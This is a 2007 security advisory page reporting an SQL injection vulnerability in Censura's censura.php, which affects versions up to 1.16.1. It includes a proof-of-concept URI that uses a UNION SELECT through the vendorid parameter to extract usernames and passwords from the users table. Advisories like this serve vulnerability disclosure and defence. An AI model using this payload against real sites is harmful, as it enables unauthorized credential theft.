exploits , vulnerabilities , articles , Censura Censura.PHP SQL Injection Vulnerability

Title	Censura Censura.PHP SQL Injection Vulnerability
Published	2007-05-03-12:00AM
Updated	2007-05-08-04:39PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Cyber-Security is credited with the discovery of this vulnerability.
Vulnerable	Censura Censura 1.16.1 Censura Censura 1.16 Censura Censura 1.15.2
Not Vulnerable	Censura Censura 1.16.2
Code	Attackers can use a browser to exploit this issue. The following proof-of-concept URI is available: http://www.example.com/censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-12-03 IBM Rational ClearQuest Maintenance Tool Local Information Disclosure Vulnerability
• 2008-12-03 VMware Products Unspecified Host Memory Corruption Vulnerability
• 2008-12-03 IBM Rational ClearQuest Web Multiple Unspecified Cross Site Scripting Vulnerabilities
• 2008-12-02 RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
• 2008-12-02 Softbiz Classifieds Script Multiple Cross Site Scripting Vulnerabilities
• 2008-12-02 CodeToad ASP Shopping Cart Script Cross Site Scripting Vulnerability
• 2008-12-02 xrdp Multiple Buffer Overflow Vulnerabilities
• 2008-12-02 FFmpeg Multiple Denial of Service Vulnerabilities
• 2008-12-01 SystemImager Flamethrower Insecure Temporary File Creation Vulnerabilities
• 2008-12-01 Rumpus FTP Server Command Argument Remote Buffer Overflow Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 19:38:16 +0000